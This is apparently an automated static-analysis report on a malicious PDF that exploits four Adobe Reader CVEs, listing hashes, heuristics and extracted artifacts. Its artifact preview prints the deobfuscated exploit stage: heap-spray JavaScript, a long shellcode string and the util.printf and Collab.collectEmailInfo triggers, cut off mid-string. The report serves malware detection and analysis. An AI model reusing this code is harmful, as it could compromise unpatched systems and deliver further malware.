Malicious PDF — malware analysis report

Static analysis result for SHA-256 871f0d1a85ec1dc0…

Verdict: MALICIOUS
File type: PDF
Size: 15.7 KB
MD5: ae4671dd126b638d0ce8545442c23886
SHA-1: 6e0e0e4b096d9c29c9b20c76080f6e369f53fcee
SHA-256: 871f0d1a85ec1dc09f0b7e2a219d6fc45f67ad4691d22962132456a45113308f
Risk score: 676

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The sample is a PDF file that contains embedded JavaScript designed to exploit multiple Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The JavaScript is heavily obfuscated and uses a substitution-hex decoder to retrieve the exploit payload. This exploit cluster is designed to download and execute a second-stage payload, as indicated by the ClamAV detection of 'Js.Exploit.Shellcode-18' on an extracted artifact.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (12)

  • media.newPlayer — CVE-2009-4324 (critical; CVE, exact; rule CVE_2009_4324)
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 (critical; CVE, exact; rule CVE_2009_0927)
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE, exact; rule CVE_2007_5659)
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 (critical; CVE, exact; rule CVE_2008_2992)
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher (critical; CVE, likely; rule PDF_PIDIEF_MULTI_CVE_DISPATCH)
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 (critical; rule CLAMAV_DETECTION)
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
  • Multi-CVE Adobe Reader JavaScript exploit kit (critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT)
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action (low; 3 related findings; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Large comment-padded JavaScript eval stager (high; rule PDF_JS_LARGE_COMMENT_PADDED_EVAL)
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
  • Embedded JS stream (low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0006_000.js
SHA-256: aec0b1c694c5fce55c92314d8216b104a9b376b437e74d834faa6051867d99e3
Kind: pdf-javascript-stream
Source: PDF /JS object 6 at offset 0x143
Size: 425033 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function Ba(Xa){ /*
... (truncated)
Filename: legacy_pdfkit_stage_000.js
SHA-256: 355266294bb87d477803b09a09e011a2a3bade3dfff24a50d2288db8dac4596e
Kind: deobfuscated-js
Source: comment-padded substitution-hex decoded JavaScript at offset 0x143
Size: 10413 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uD0FF%uE823%uB405%uD882%uD005%u6323%uDC45%u98A8%u7D19%u98A8%u510D%uE8E7%u2FF2%u63DC%u6BE9%uE86B%uD005%uE849%u5E6D%uE66D%uB8E9%u16BB%uDE8F%u074B%u30CB%u8043%u1A36%uB3A9%uE86D%u4401%uB8E2%uA1C9%u388F%u334B%uF38F%u80CA%u9C5E%u3539%u3C6D%uEBB4%u3809%uE93C%uD005%uECAA%u532E%uECC8%u100E%u1956%uBE6D%u9C46%uB805%u8154%uB96B%u1777%uF850%uB17A%u100E%u6C2C%uD0FD%uE823%u208E%uB098%uD005%u8223%uB805%uAC0A%u87ED%uA14B%uDFE8%u805D%u9B8E%uB7C0%u30ED%uE823%u5905%uC327%u3B86%uE327%uA5C5%u65D2%uD080%uE821%u8005%u174B%uD005%u1723%uE450%u6DAE%uD405%uE823%uBA55%u8223%u5D05%uE8A6%uD007%uB823%u85FA%u651B%uD0B0%uE827%u7C05%u2829%u2B70%u2F6D%uFE03%u9046%u1760%uEC65%uD005%uE823%u5588%uEC23%uD005%u2110%u8054%uBDDC%u9039%u6C2C%uD085%uE823%u594D%uA466%uD06D%uE863%uBA05%u1763%u9850%u2828%uBE71%uADAA%uBA65%u8223%uBA05%u8223%uBA05%u1723%u8050%u2828%u8A71%uE849%uD06D%uE823%uBA01%u8223%u3905%uE889%uD005%u1773%u8450%u2828%u9271%uADAA%u5D6D%u8C66%uB855%uA823%uD005%u9DDC%u2F65%u8056%u85FA%uE37B%uA4C5%u6336%uB440%u2828%uDE71%u9DDC%u2F61%u8856%uA5FA%u176F%u9050%u3DC8%uA5FA%u176F%u9450%u2108%u8144%u6DAE%uD405%uE823%u2F55%uC476%u2F6F%uBDDC%u8535%u04A8%uAD8E%uE32B%uA4FA%uBB68%u0E8E%u6375%uEC76%u9CA8%uA836%u1B20%u5B53%uC855%u2306%u2110%u914C%uEB8E%u86C6%u1E10%u6E0A%uD033%uA4D3%u292B%uDDCB%u1A20%u3B45%uD3D2%u8EFB%u0D56%u5B5F%u63C8%uF45F%u3520%u5B63%uA32F%u8A8E%uEB3F%u5BD8%u6327%u1506%uB37D%uD2EE%u2810%u1258%uE827%u81ED%u17DC%uB8FA%u9C57%uEA75%uC70C%uA364%u894A%uA06B%u9A4C%uA46B%u8151%uFE75%u8740%uFF68%u9A57%uB464%uC746%uB33A%uD91E%uA323%u8C4A%uE238%uDE12%uE236%u8942%uB161%u8B14%uE935%u8941%uB466%uD047%uB332%uD816%uE067%uDA41%uB160%u891A%uF631%uD550%uD036%uE823%u0005");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
	
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%uD0FF%uE823%uB405%uD882%uD005%u6323%uDC45%u98A8%u7D19%u98A8%u510D%uE8E7%u2FF2%u63DC%u6BE9%uE86B%uD005%uE849%u5E6D%uE66D%uB8E9%u16BB%uDE8F%u074B%u30CB%u8043%u1A36%uB3A9%uE86D%u4401%uB8E2%uA1C9%u388F%u334B%uF38F%u80CA%u9C5E%u3539%u3C6D%uEBB4%u3809%uE93C%uD005%uECAA%u532E%uECC8%u100E%u1956%uBE6D%u9C46%uB805%u8154%uB96B%u1777%uF850%uB17A%u100E%u6C2C%uD0FD%uE823%u208E%uB098%uD005%u8223%uB805%uAC0A%u87ED%uA14B%uDFE8%u805D%u9B8E%uB7C0%u30ED%uE823%u5905%uC327%u3B86%uE327%uA5C5%u65D2%uD080%uE821%u8005%u174B%uD005%u1723%uE450%u6DAE%uD405%uE823%uBA55%u8223%u5D05%uE8A6%uD007%uB823%u85FA%u651B%uD0B0%uE827%u7C05%u2829%u2B70%u2F6D%uFE03%u9046%u1760%uEC65%uD005%uE823%u5588%uEC23%uD005%u2110%u8054%uBDDC%u9039%u6C2C%uD085%uE823%u594D%uA466%uD06D%uE863%uBA05%u1763%u9850%u2828%uBE71%uADAA%uBA65%u8223%uBA05%u8223%uBA05%u1723%u8050%u2828%u8A71%uE849%uD06D%uE823%uBA01%u8223%u3905%uE889%uD005%u1773%u8450%u2828%u9271%uADAA%u5D6D%u8C66%uB855%uA823%uD005%u9DDC%u2F65%u8056%u85FA%uE37B%uA4C5%u6336%uB440%u2828%uDE71%u9DDC%u2F61%u8856%uA5FA%u176F%u9050%u3DC8%uA5FA%u176F%u9450%u2108%u8144%u6DAE%uD405%uE823%u2F55%uC476%u2F6F%uBDDC%u8535%u04A8%uAD8E%uE32B%uA4FA
... (truncated)